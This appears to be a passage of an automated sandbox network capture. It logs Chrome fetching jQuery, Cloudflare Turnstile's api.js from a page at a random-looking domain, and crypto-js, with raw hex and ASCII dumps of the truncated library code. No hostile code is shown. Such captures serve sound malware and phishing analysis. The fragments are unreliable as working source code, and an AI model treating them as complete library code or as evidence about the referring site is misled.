                                                                                                                                                2024-10-28 16:49:16 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                2024-10-28 16:49:16 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                                Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                                                2024-10-28 16:49:16 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                                Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                                                2024-10-28 16:49:16 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                                                Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                                                2024-10-28 16:49:16 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                                                Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                                                2024-10-28 16:49:16 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                                                Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                59192.168.2.1649795104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:16 UTC644OUTGET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                Referer: https://8sq.w2agn.com/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:16 UTC471INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:49:16 GMT
                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                Content-Length: 47672
                                                                                                                                                Connection: close
                                                                                                                                                accept-ranges: bytes
                                                                                                                                                last-modified: Wed, 23 Oct 2024 21:21:17 GMT
                                                                                                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c6b0fdb446b3a-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:49:16 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                                                                                2024-10-28 16:49:16 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                2024-10-28 16:49:16 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                                                                                Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function D(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(l[0
                                                                                                                                                2024-10-28 16:49:16 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var q;(fu
                                                                                                                                                2024-10-28 16:49:16 UTC1369INData Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20
                                                                                                                                                Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($||($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var
                                                                                                                                                2024-10-28 16:49:16 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28
                                                                                                                                                Data Ascii: }function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(
                                                                                                                                                2024-10-28 16:49:16 UTC1369INData Raw: 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 66 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4d 28 6b 72 2c 28 6c 3d 28 72 3d 65 2e 64
                                                                                                                                                Data Ascii: ).concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(f)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=M(kr,(l=(r=e.d
                                                                                                                                                2024-10-28 16:49:16 UTC1369INData Raw: 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79
                                                                                                                                                Data Ascii: sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,l,g){var h=[null];h.push.apply
                                                                                                                                                2024-10-28 16:49:16 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 6c 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 6c 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 6c 2e 63 6f 64 65 3d 63 2c 6c 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74
                                                                                                                                                Data Ascii: call(this,o),Me(Be(l),"code",void 0),l.name="TurnstileError",l.code=c,l}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){ret
                                                                                                                                                2024-10-28 16:49:16 UTC1369INData Raw: 64 69 76 22 29 3b 75 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 75 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 75 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 75 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 75 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 75 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30
                                                                                                                                                Data Ascii: div");u.style.position="fixed",u.style.zIndex="2147483646",u.style.width="100vw",u.style.height="100vh",u.style.top="0",u.style.left="0",u.style.transformOrigin="center center",u.style.overflowX="hidden",u.style.overflowY="auto",u.style.background="rgba(0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                60192.168.2.1649796104.17.25.144436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:16 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                                                Host: cdnjs.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:17 UTC954INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:49:17 GMT
                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                Cache-Control: public, max-age=30672000
                                                                                                                                                ETag: W/"61182885-40eb"
                                                                                                                                                Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                                                cf-cdnjs-via: cfworker/kv
                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 104372
                                                                                                                                                Expires: Sat, 18 Oct 2025 16:49:17 GMT
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m7F7pyOifdOC5egJeyRqQuy9sjIQjUL0fLd1OYaBJLdUcO2JUZpacu61VhPEOAqNgPNBCu4pAfgGw85hrw52PWPSDxX%2Fz6ZewcDAYoJte4xTIfRJm7m6TEXIotuqJNbBNh27Audj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Strict-Transport-Security: max-age=15780000
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c6b117d8fe5ea-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
